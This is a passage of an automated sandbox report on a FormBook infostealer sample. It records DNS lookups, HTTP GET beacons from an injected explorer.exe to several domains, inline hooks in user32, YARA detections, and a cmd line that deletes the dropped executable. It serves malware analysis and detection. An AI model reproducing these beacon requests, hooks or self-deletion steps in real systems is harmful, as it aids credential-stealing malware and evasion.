                                            Jan 13, 2021 21:00:54.856384039 CET192.168.2.58.8.8.80x2814Standard query (0)www.bigdudedesign.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 13, 2021 20:59:31.032233000 CET8.8.8.8192.168.2.50x5a0aNo error (0)www.ricardoinman.comricardoinman.comCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 20:59:31.032233000 CET8.8.8.8192.168.2.50x5a0aNo error (0)ricardoinman.com34.102.136.180A (IP address)IN (0x0001)
                                            Jan 13, 2021 20:59:52.796684027 CET8.8.8.8192.168.2.50xcb2dNo error (0)www.www7456.com154.86.142.251A (IP address)IN (0x0001)
                                            Jan 13, 2021 20:59:53.798858881 CET8.8.8.8192.168.2.50xcb2dNo error (0)www.www7456.com154.86.142.251A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:11.562460899 CET8.8.8.8192.168.2.50x25e8No error (0)www.theatomicshots.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                            Jan 13, 2021 21:00:11.562460899 CET8.8.8.8192.168.2.50x25e8No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:11.562460899 CET8.8.8.8192.168.2.50x25e8No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:11.562460899 CET8.8.8.8192.168.2.50x25e8No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:11.562460899 CET8.8.8.8192.168.2.50x25e8No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:32.269376040 CET8.8.8.8192.168.2.50x223No error (0)www.fallgus.com103.224.182.242A (IP address)IN (0x0001)
                                            Jan 13, 2021 21:00:54.997180939 CET8.8.8.8192.168.2.50x2814No error (0)www.bigdudedesign.com199.59.242.153A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.ricardoinman.com
                                            • www.www7456.com
                                            • www.theatomicshots.com
                                            • www.fallgus.com
                                            • www.bigdudedesign.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.54970234.102.136.18080C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 20:59:31.084306955 CET34OUTGET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=43tORsMo6Gry83Td78nIWgxEplzIHXHZqBl7iQpQA31ZPQcRtwVYWDcsKQZGhQx+cBJl HTTP/1.1
                                            Host: www.ricardoinman.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 20:59:31.222795963 CET35INHTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 13 Jan 2021 19:59:31 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "5ffc838f-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.549703154.86.142.25180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 20:59:53.073518991 CET36OUTGET /xle/?uXrpEpT=uzo0q0TnKI1EbCdNPQJu8iBLwxReibO1ZCV2f0LDQIq1wR/qMfZZPE6SLM+PUhnJc0M8&0V3lvN=YvRXzPexWxVddR HTTP/1.1
                                            Host: www.www7456.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 20:59:53.346900940 CET37INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 13 Jan 2021 19:59:51 GMT
                                            Content-Type: text/html
                                            Content-Length: 505
                                            Connection: close
                                            ETag: "5f98d73b-1f9"
                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.549704198.49.23.14480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:00:11.721623898 CET38OUTGET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUeyauD7Ycns HTTP/1.1
                                            Host: www.theatomicshots.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:00:11.881947041 CET39INHTTP/1.1 400 Bad Request
                                            Cache-Control: no-cache, must-revalidate
                                            Content-Length: 77564
                                            Content-Type: text/html; charset=UTF-8
                                            Date: Wed, 13 Jan 2021 20:00:11 UTC
                                            Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                            Pragma: no-cache
                                            Server: Squarespace
                                            X-Contextid: XPiIZouo/MXGzH7RM
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                            Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            3192.168.2.549705103.224.182.24280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:00:32.457227945 CET62OUTGET /xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR HTTP/1.1
                                            Host: www.fallgus.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:00:32.665769100 CET63INHTTP/1.1 302 Found
                                            Date: Wed, 13 Jan 2021 20:00:32 GMT
                                            Server: Apache/2.4.25 (Debian)
                                            Set-Cookie: __tad=1610568032.6283841; expires=Sat, 11-Jan-2031 20:00:32 GMT; Max-Age=315360000
                                            Location: http://ww25.fallgus.com/xle/?uXrpEpT=cFX1FrcwDqMX+IN0jqclYIdWbU407iK5CKMwEtxyEXpkIlBYmHSlzkKZME9DYGRJLQkE&0V3lvN=YvRXzPexWxVddR&subid1=20210114-0700-326f-8339-544bab45d1f5
                                            Content-Length: 0
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            4192.168.2.549706199.59.242.15380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 13, 2021 21:00:55.123081923 CET63OUTGET /xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0 HTTP/1.1
                                            Host: www.bigdudedesign.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 13, 2021 21:00:55.246642113 CET65INHTTP/1.1 200 OK
                                            Server: openresty
                                            Date: Wed, 13 Jan 2021 20:00:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XwYFrnlyPu5jWvWrdq84v1G6SsvYaEYwokt3UWzay0h67CH4DH8mTUMEGVNDpMAQMWAXBNEHwCF0Nu40JOdPLg==
                                            Data Raw: 66 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 58 77 59 46 72 6e 6c 79 50 75 35 6a 57 76 57 72 64 71 38 34 76 31 47 36 53 73 76 59 61 45 59 77 6f 6b 74 33 55 57 7a 61 79 30 68 36 37 43 48 34 44 48 38 6d 54 55 4d 45 47 56 4e 44 70 4d 41 51 4d 57 41 58 42 4e 45 48 77 43 46 30 4e 75 34 30 4a 4f 64 50 4c 67 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                            Data Ascii: ff9<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XwYFrnlyPu5jWvWrdq84v1G6SsvYaEYwokt3UWzay0h67CH4DH8mTUMEGVNDpMAQMWAXBNEHwCF0Nu40JOdPLg=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE4
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE4
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x83 0x3E 0xE4
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xE4

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:20:58:16
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\zHgm9k7WYU.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\zHgm9k7WYU.exe'
                                            Imagebase:0x5b0000
                                            File size:1081344 bytes
                                            MD5 hash:D97A26894EC19DC562EEC833CCB5607F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254778297.0000000002D31000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:20:58:26
                                            Start date:13/01/2021
                                            Path:C:\Users\user\Desktop\zHgm9k7WYU.exe
                                            Wow64 process (32bit):true
                                            Commandline:{path}
                                            Imagebase:0xed0000
                                            File size:1081344 bytes
                                            MD5 hash:D97A26894EC19DC562EEC833CCB5607F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:20:58:29
                                            Start date:13/01/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:
                                            Imagebase:0x7ff693d90000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:20:58:42
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\explorer.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\explorer.exe
                                            Imagebase:0x13b0000
                                            File size:3611360 bytes
                                            MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:20:58:47
                                            Start date:13/01/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
                                            Imagebase:0xe70000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:20:58:48
                                            Start date:13/01/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7ecfc0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

